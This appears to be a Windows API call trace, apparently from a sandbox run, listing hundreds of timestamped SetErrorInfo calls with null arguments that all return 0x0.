[0061.272] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.284] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.284] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.284] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.292] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.293] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.293] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.294] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.294] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.294] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.295] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.306] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.308] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.309] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.310] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.311] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.312] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.318] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.320] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.320] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.320] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.320] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.321] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.321] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.321] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.321] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.321] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.323] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.324] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.324] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.324] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.324] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.324] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.325] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.325] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.325] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.325] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.325] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.326] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.326] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.326] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.326] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.326] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.327] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.327] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.327] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.327] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.327] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.329] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.332] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.336] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.337] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.338] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.339] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.340] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.340] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.340] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.340] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.340] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.359] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.360] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.360] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.366] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.367] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.367] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.367] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.368] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.368] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.368] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.378] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
